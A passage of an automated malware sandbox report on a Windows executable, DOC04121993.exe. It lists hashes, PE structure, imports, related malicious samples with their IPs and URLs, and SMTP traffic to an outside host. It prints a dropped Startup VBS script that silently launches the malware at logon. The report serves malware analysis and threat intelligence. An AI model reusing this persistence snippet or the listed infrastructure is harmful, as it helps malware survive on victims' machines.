                                                                  https://winnersoft.lu/systemadmin/?12=Get hashmaliciousBrowse
                                                                  • 91.121.74.46
                                                                  https://carolearmstrongrealestate.com/wpe/14ea332d0684051d9fef033a5f1607dd?usr=cnBlbmRsZXRvbkBkYXRlc3dlaXNlci5jb20=Get hashmaliciousBrowse
                                                                  • 51.38.157.153
                                                                  Order specs19.11.20.exeGet hashmaliciousBrowse
                                                                  • 51.195.43.214
                                                                  QUOTE.exeGet hashmaliciousBrowse
                                                                  • 51.89.1.123
                                                                  ORDER INQUIRY.exeGet hashmaliciousBrowse
                                                                  • 51.91.236.193
                                                                  KYC_DOC_.EXEGet hashmaliciousBrowse
                                                                  • 51.79.191.17
                                                                  MV GRAN LOBO 008.xlsxGet hashmaliciousBrowse
                                                                  • 188.165.53.185
                                                                  MV GRAN LOBO 008.xlsxGet hashmaliciousBrowse
                                                                  • 188.165.53.185
                                                                  d9f83622ec1564600202a937d2414af8.exeGet hashmaliciousBrowse
                                                                  • 66.70.204.222
                                                                  direct_010.20.docGet hashmaliciousBrowse
                                                                  • 94.23.162.163
                                                                  #Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htmGet hashmaliciousBrowse
                                                                  • 51.210.112.130

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
                                                                  Process:C:\Windows\SysWOW64\notepad.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):122
                                                                  Entropy (8bit):5.36354376778109
                                                                  Encrypted:false
                                                                  SSDEEP:3:7gwJMr/vtVlmEHhA1FWXp5vhqm77trinRkn:UzPldBA7WXpF8m71i2n
                                                                  MD5:863B251962DCEFF8DC4CF0794C51DBD7
                                                                  SHA1:639371523C3274C4B3CED14564213AE2AC5F67E7
                                                                  SHA-256:A2755DC8A8AD6573A09C4E3CD83265747842802D9AA9CD7AF16939FCFF8B17BF
                                                                  SHA-512:F10460F89A54CF00E9BDE282C776B586901D92921C42B3FC26AA2FBAD4AD5B553DB8F9DC476BEFADCDC6F83838C9A0AB2AF25CEB99F7766CFDE335AB042ED96D
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview: seT ODikjwDxemlA = cREAtEobJect("wsCrIpt.ShEll")..OdIkjWdxemlA.run """C:\Users\user\Desktop\DOC04121993.exe""", 0, False.

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.879727497186752
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  File name:DOC04121993.exe
                                                                  File size:978432
                                                                  MD5:710843b45a8e65c939d3ab4fb96d73e4
                                                                  SHA1:909799ac70c5a8a472b40579ff0c5bc982979676
                                                                  SHA256:d0ea8610ecee6c92c50af51c37a0a49f8550768609a08a5a2dcaf98bb06dcff3
                                                                  SHA512:04508620bcb1d8406cddcd0ae1dd9f0c31f27ad6e5c140fba402a0c5951901ae62e0f006a35e897f101cac36849981b8379585f906c5db0ef8f4686e7fb8acbc
                                                                  SSDEEP:12288:NuhWgv/dKx2k3bue05YyZVr0ZEs+ihR6JL4o9YWg/XLq7XJK/hmlYpOo5WpxIp:Nwz1Kx2k3T0jZGOL7JLBiWgk508lGQKp
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:eaee8e96b2a8e0b2

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x470d00
                                                                  Entrypoint Section:CODE
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:429b4d8f1079c5bb87cad5efdb4eabf0

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFF0h
                                                                  mov eax, 00470B08h
                                                                  call 00007F0B54E286EDh
                                                                  mov eax, dword ptr [00489FACh]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F0B54E7D715h
                                                                  mov ecx, dword ptr [0048A0A4h]
                                                                  mov eax, dword ptr [00489FACh]
                                                                  mov eax, dword ptr [eax]
                                                                  mov edx, dword ptr [004705ACh]
                                                                  call 00007F0B54E7D715h
                                                                  mov eax, dword ptr [00489FACh]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F0B54E7D789h
                                                                  call 00007F0B54E261E4h
                                                                  lea eax, dword ptr [eax+00h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8c0000x2496.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x990000x5b424.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x910000x7b70.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x900000x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  CODE0x10000x6fd480x6fe00False0.517266061453data6.51621253086IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  DATA0x710000x191300x19200False0.189841806592data2.85009273727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  BSS0x8b0000xcb10x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .idata0x8c0000x24960x2600False0.352796052632data4.9419643729IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .tls0x8f0000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x900000x180x200False0.048828125data0.186582516435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                  .reloc0x910000x7b700x7c00False0.575321320565data6.64623366609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x990000x5b4240x5b600False0.776162790698data7.33023350526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_CURSOR0x99ed80x134data
                                                                  RT_CURSOR0x9a00c0x134data
                                                                  RT_CURSOR0x9a1400x134data
                                                                  RT_CURSOR0x9a2740x134data
                                                                  RT_CURSOR0x9a3a80x134data
                                                                  RT_CURSOR0x9a4dc0x134data
                                                                  RT_CURSOR0x9a6100x134data
                                                                  RT_BITMAP0x9a7440x1d0data
                                                                  RT_BITMAP0x9a9140x1e4data
                                                                  RT_BITMAP0x9aaf80x1d0data
                                                                  RT_BITMAP0x9acc80x1d0data
                                                                  RT_BITMAP0x9ae980x1d0data
                                                                  RT_BITMAP0x9b0680x1d0data
                                                                  RT_BITMAP0x9b2380x1d0data
                                                                  RT_BITMAP0x9b4080x1d0data
                                                                  RT_BITMAP0x9b5d80x472f5dataEnglishUnited States
                                                                  RT_BITMAP0xe28d00x1d0data
                                                                  RT_BITMAP0xe2aa00xc0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe2b600xd8data
                                                                  RT_BITMAP0xe2c380xe0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe2d180xe0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe2df80xe0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe2ed80xc0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe2f980xc0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe30580xe0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe31380xd8data
                                                                  RT_BITMAP0xe32100xd8data
                                                                  RT_BITMAP0xe32e80xc0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe33a80xd8data
                                                                  RT_BITMAP0xe34800xe0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe35600xd8data
                                                                  RT_BITMAP0xe36380xe8GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe37200xc0GLS_BINARY_LSB_FIRST
                                                                  RT_BITMAP0xe37e00xe0GLS_BINARY_LSB_FIRST
                                                                  RT_ICON0xe38c00xd228data
                                                                  RT_ICON0xf0ae80x8a8dataEnglishUnited States
                                                                  RT_DIALOG0xf13900x52data
                                                                  RT_STRING0xf13e40x194data
                                                                  RT_STRING0xf15780x2b0data
                                                                  RT_STRING0xf18280xdcdata
                                                                  RT_STRING0xf19040x17cdata
                                                                  RT_STRING0xf1a800x1f0data
                                                                  RT_STRING0xf1c700x4acdata
                                                                  RT_STRING0xf211c0x39cdata
                                                                  RT_STRING0xf24b80x378data
                                                                  RT_STRING0xf28300x418data
                                                                  RT_STRING0xf2c480xf4data
                                                                  RT_STRING0xf2d3c0xc4data
                                                                  RT_STRING0xf2e000x2e0data
                                                                  RT_STRING0xf30e00x35cdata
                                                                  RT_STRING0xf343c0x2b4data
                                                                  RT_RCDATA0xf36f00x10data
                                                                  RT_RCDATA0xf37000x280data
                                                                  RT_RCDATA0xf39800x841Delphi compiled form 'TForm1'
                                                                  RT_GROUP_CURSOR0xf41c40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                  RT_GROUP_CURSOR0xf41d80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                  RT_GROUP_CURSOR0xf41ec0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                  RT_GROUP_CURSOR0xf42000x14Lotus unknown worksheet or configuration, revision 0x1
                                                                  RT_GROUP_CURSOR0xf42140x14Lotus unknown worksheet or configuration, revision 0x1
                                                                  RT_GROUP_CURSOR0xf42280x14Lotus unknown worksheet or configuration, revision 0x1
                                                                  RT_GROUP_CURSOR0xf423c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                  RT_GROUP_ICON0xf42500x14dataEnglishUnited States
                                                                  RT_GROUP_ICON0xf42640x14data
                                                                  RT_HTML0xf42780x1a9dataEnglishUnited States

                                                                  Imports

                                                                  DLLImport
                                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                  user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                  kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVolumeInformationA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDriveTypeA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                  mpr.dllWNetGetConnectionA
                                                                  gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                  user32.dllWindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                  kernel32.dllSleep
                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                  comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                  kernel32.dllMulDiv

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 21, 2020 10:36:43.006767035 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.110047102 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.110234022 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.337428093 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.338118076 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.441622019 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.442186117 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.547034979 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.597945929 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.611474037 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.720846891 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.720907927 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.720932961 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.721205950 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.733109951 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.836888075 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:43.879349947 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:43.923821926 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.027242899 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.028197050 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.131588936 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.132076025 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.235878944 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.236903906 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.340192080 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.341260910 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.444878101 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.445885897 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.549367905 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.552282095 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.552587986 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.552819014 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.553050995 CET49731587192.168.2.366.70.204.222
                                                                  Nov 21, 2020 10:36:44.655755043 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.655802965 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.655822992 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.656056881 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.658006907 CET5874973166.70.204.222192.168.2.3
                                                                  Nov 21, 2020 10:36:44.707648993 CET49731587192.168.2.366.70.204.222

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 21, 2020 10:35:59.611641884 CET5836153192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:35:59.647598028 CET53583618.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:00.476222038 CET6349253192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:00.503604889 CET53634928.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:01.211216927 CET6083153192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:01.238569975 CET53608318.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:01.956403017 CET6010053192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:01.983720064 CET53601008.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:02.867257118 CET5319553192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:02.894689083 CET53531958.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:03.809859991 CET5014153192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:03.837081909 CET53501418.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:04.494957924 CET5302353192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:04.530426025 CET53530238.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:05.522062063 CET4956353192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:05.549319029 CET53495638.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:07.763705015 CET5135253192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:07.791035891 CET53513528.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:09.928251982 CET5934953192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:09.955519915 CET53593498.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:11.010195971 CET5708453192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:11.037492990 CET53570848.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:11.758013010 CET5882353192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:11.785459042 CET53588238.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:12.388540030 CET5756853192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:12.415865898 CET53575688.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:13.139347076 CET5054053192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:13.175124884 CET53505408.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:25.613919020 CET5436653192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:25.641292095 CET53543668.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:30.761260033 CET5303453192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:30.798211098 CET53530348.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:37.193355083 CET5776253192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:37.231781960 CET53577628.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:40.813800097 CET5543553192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:40.857342958 CET53554358.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:36:42.922708035 CET5071353192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:36:42.969963074 CET53507138.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:37:01.039278984 CET5613253192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:37:01.066524982 CET53561328.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:37:03.973825932 CET5898753192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:37:04.022171974 CET53589878.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:37:35.499826908 CET5657953192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:37:35.527122974 CET53565798.8.8.8192.168.2.3
                                                                  Nov 21, 2020 10:37:37.098423958 CET6063353192.168.2.38.8.8.8
                                                                  Nov 21, 2020 10:37:37.125749111 CET53606338.8.8.8192.168.2.3

                                                                  DNS Queries

